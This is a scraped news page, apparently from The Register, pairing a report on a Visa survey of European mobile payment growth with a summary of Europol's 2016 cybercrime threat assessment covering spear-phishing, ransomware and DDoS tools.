Mobile payments going gangbusters, beams Visa Consumers use of a mobile device – either a smartphone, tablet or wearable – to make payments has tripled over the past year, according to a Visa-backed survey. The number of Europeans regularly using a mobile device for payments has tripled from 18 per cent to 54 per cent since 2015, according to the results of an online poll of 36,000 consumers in 19 European countries. Uptake is strong in both developing markets, such as Turkey, where mobile has leapfrogged traditional payment methods, and in tech-savvy markets, such as the Nordics. In the UK, over two-fifths (43 per cent) purchase high-value items such as holidays and electronics on a mobile device as well as using their mobiles regular transactions such as paying household bills (42 per cent) and buying bus or train tickets (41 per cent). More than half the Brits surveyed (58 per cent) used contactless cards this year, up from 20 per cent in 2015. Meanwhile mobile banking activity is increasing across all age groups, according to Visa. The launch of Apple Pay and Android Pay in Europe is helping to push the payments by mobile device trend, which Kevin Jenkins, UK & Ireland managing director at Visa, described as the “future of digital payments”. Infosec experts struck a much more cautious note. Mark James, security specialist at ESET, commented: “It’s no surprise that mobile payments are now becoming more widely used and now we have integrated biometric authentication into our phones it definitely makes it a lot safer for the end user to utilise that technology to their advantage.” “Using a mobile device is so easy, from getting the payment card on to the phone through to actually making the payment and much like credit cards, often too easy,” James added. “Phone manufacturers want your device to be the very centre of your digital life; it interacts with us throughout the day and often is used to wake us first thing in the morning.
It makes sense that our finances will also be controlled and managed from these devices and we will definitely see more and more companies making it easy for us to pay on mobile devices.

But let’s not forget security; it is very important to understand the risks of using your phone for payments, boarding passes and everything else we do.” ® * Tap (mobile phone) to pay.

The phrase "pay by bonk" was coined by former Reg mobile supremo Bill Ray back in 2012...

Urgent! Log in for spear-phisher survey or your account will be...

Europol: Cybercrims getting more devious Europol’s annual cyber-crime survey warns that the quality of spearphishing and other "CEO fraud" is continuing to improve and "cybercrime-as-a-service" means an ever larger group of fraudsters can easily commit online attacks. Many threats remain from last year – banking trojan attacks are still an issue for businesses and individuals although this has now been eclipsed by ransomware which is growing more quickly. The ease of access to cyber-crime tools means that it now exceeds real world crime in terms of value in many European countries. The report warns that although there is very limited use of these tools by extremist groups, the fact that they're simple to use, and fairly simple to access via the Dark web, means that could quickly change.
It notes that such groups make wide use of social media for propaganda and recruitment there is little evidence of use of cyber-attack capabilities beyond website defacement. Europol is also seeing the first evidence of organised criminal gangs beginning to exploit contactless cards. It warns of increasing use of booter/stresser tools to run DDos attacks. It has also seen a marked improvement in the quality and apparent authenticity of spear-phishing attacks – making them ever harder to separate from genuine communications. Data remains a key target for cybercrims.

But they’re increasingly using it either to encrypt, for ransom, for direct extortion or to further more complex fraud, not just for immediate gain. Another change this year is an increase in live streamed child sexual abuse. Europol said: “The use of end-to-end encrypted platforms for sharing media, coupled with the use of largely anonymous payment systems, is facilitating an escalation in the live streaming of child abuse. Offenders target regions where there are high levels of poverty, limited domestic child protection measures and easy access to children.” Beyond recommending more resources for cyber-crime law enforcement Europol wants more collaboration and intelligence sharing to deal with Darknet investigations and prevent duplication of effort and improve sharing of tools and tactics. More broadly it calls for a phenomenon-based approach to replace incident response.
It notes that successes in combating fraud in the airline industry could be replicated for other industries.

Equally operations to target offenders who need to be in a physical location – like car rental – in order to collect the proceeds of cyber-crime. The full Internet Organised Crime Threat Assessment 2016 is available to download here.